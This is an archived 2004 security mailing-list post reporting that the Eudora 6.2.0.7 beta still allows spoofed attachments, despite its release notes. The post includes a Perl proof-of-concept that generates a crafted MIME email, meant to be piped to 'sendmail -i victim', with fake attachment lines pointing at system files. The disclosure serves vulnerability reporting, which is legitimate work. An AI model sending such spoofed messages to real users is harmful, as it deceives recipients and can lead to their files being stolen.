Eudora 6.2.0.7 attachment spoof

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 10/11/04

  • Next message: James Tucker: "Re: [Full-Disclosure] Google Desktop Search"
    Date: Mon, 11 Oct 2004 08:23:53 +1000 (EST)
    To: NTBugtraq@listserv.ntbugtraq.com, beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    
    

    Eudora 6.2.0.7 for Windows is in beta testing since 8 Oct 2004. The release
    notes
    http://www.eudora.com/download/eudora/windows/6.2/Betas/RelNotes.txt
    say:

    > SECURITY
    > --------
    > Fixed cases where attachments could be spoofed via base64 or quoted-printable
    > encoded (plain-text, inline) MIME parts.

    Not so. Harmless demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    use MIME::Base64;

    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.2.0.7 on Windows spoof\n";
    print "MIME-Version: 1.0\n";
    print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

    print "--zzz\n";
    print "Content-Type: text/plain\n";
    print "Content-Transfer-Encoding: 7bit\n\n";
    print "With spoofed attachments, we could 'steal' files (after a warning?)
    if the message was forwarded (not replied to).\n";

    print "\n--zzz\n";
    print "Content-Type: text/html; name=\"qp.txt\"\n";
    print "Content-Transfer-Encoding: quoted-printable \n";
    print "Content-Disposition: inline; filename=\"qp.txt\"\n\n";
    print "Within text/html part, use </x-html> to get back to plaintext,
    no need for NUL or linebreak or nothing:
    </x-html>\n";
    print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted=
    : \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";

    print "\n--zzz--\n";


  • Next message: James Tucker: "Re: [Full-Disclosure] Google Desktop Search"

    Relevant Pages

    • Re: Restoring folder & files Help PLEASE
      ... Don't open attachments. ... Turn off email scanning in your antivirus software. ... Windows 2000 and Windows XP. ... Windows XP Service Pack 2 Resources for IT Professionals ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Outlook Express takes forever to open
      ... Don't open attachments. ... Turn off email scanning in your antivirus software. ... Windows 2000 and Windows XP. ... Windows XP Service Pack 2 Resources for IT Professionals ...
      (microsoft.public.windowsxp.general)
    • Re: Blank message body
      ... then checked for microsoft updates. ... >> then went to the Windows update site and applied all ... Don't open attachments. ... Turn off email scanning in your antivirus software. ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Restoring Local Folders ...
      ... Please start your own thread and do so in the Windows Vista Mail newsgroup. ... This is for Outlook Express. ... Don't open attachments. ... Turn off email scanning in your antivirus software. ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Importing Emails to OE6 after resetting factory settings
      ... Don't open attachments. ... Turn off email scanning in your antivirus software. ... Windows 2000 and Windows XP. ... Windows XP Service Pack 2 Resources for IT Professionals ...
      (microsoft.public.windows.inetexplorer.ie6.outlookexpress)